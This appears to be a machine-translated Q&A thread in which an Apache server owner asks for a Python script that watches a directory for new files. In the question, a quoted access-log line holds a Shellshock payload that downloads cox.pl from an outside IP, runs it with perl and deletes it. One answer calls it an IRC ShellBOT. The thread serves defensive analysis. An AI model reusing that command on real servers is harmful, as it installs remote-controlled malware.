用于监视新文件的目录的python脚本

时间:2015-11-06 16:47:17

标签: python bash apache perl

已经提出了类似的问题,但它们要么对我不起作用,要么我不理解答案。

我运行Apache2网络服务器并托管一些小型个人网站。我正在 cyberstalked ,或者有人试图破解我。

Apache2访问日志显示

  

195.154.80.205 - - [05 / Nov / 2015:09:57:09 +0000]" GET /info.cgi HTTP / 1.1" 404 464" - " "(){:;}; / usr / bin / perl -e' print \" Content-Type:text / plain \ r \ n \ r \ n&nXSUCCESS!\" ; system(\" wget http://190.186.76.252/cox.pl -O /tmp/cox.pl;curl -O /tmp/cox.pl http://190.186.76.252/cox.pl;perl /tmp/cox.pl;rm -rf / tmp / cox.pl * \&#34);'"

显然正在尝试(在我的日志中一遍又一遍)强制我的服务器下载' cox.pl'然后运行' cox.pl'然后删除' cox.pl'。

我真的想知道cox.pl中哪些内容可能是github上的Cox-Data-Usage的修改版本。

我想要一个不断监视我的{{​​1}}文件夹的脚本,当添加新文件时,将该文件复制到另一个目录,以便我查看它正在做什么,或者至少尝试做什么。

我知道我可以拒绝访问等但我想知道这些黑客正在尝试做什么,看看我是否可以收集有关他们的情报。

2 个答案:

答案 0 :(得分:1)

有问题的脚本可以轻松下载,它包含ShellBOT by: devil__所以......猜测; - )

您可以使用tutorial_notifier.py中的pyinotify,但不需要这种特殊情况。只是做

curl http://190.186.76.252/cox.pl -o cox.pl.txt
less cox.pl.txt

检查脚本。

对于Linux 2.4.17 - 2.6.17以及可能是BSD *来说,它看起来像是一套很好的黑客攻击,对我来说并不是无害的,与IRC有关。它与Cox-Data-Usage无关。

答案 1 :(得分:0)

我得到了解决方案,

这里是代码

path_to_watch = "your/path"
print('Your folder path is"',path,'"')
before = dict ([(f, None) for f in os.listdir (path_to_watch)])
while 1:
        after = dict ([(f, None) for f in os.listdir (path_to_watch)])
        added = [f for f in after if not f in before]
        if added:
                print("Added: ", ", ".join (added))
                break
        else:
             before = after

我已编辑代码,原始代码可在 http://timgolden.me.uk/python/win32_how_do_i/watch_directory_for_changes.html

原始代码是用python 2x制作的,所以你需要在python 3中转换它。

注意:-

每当您在 PATH 中添加任何文件时,它都会打印文本并中断,如果未添加任何文件,则它会继续运行。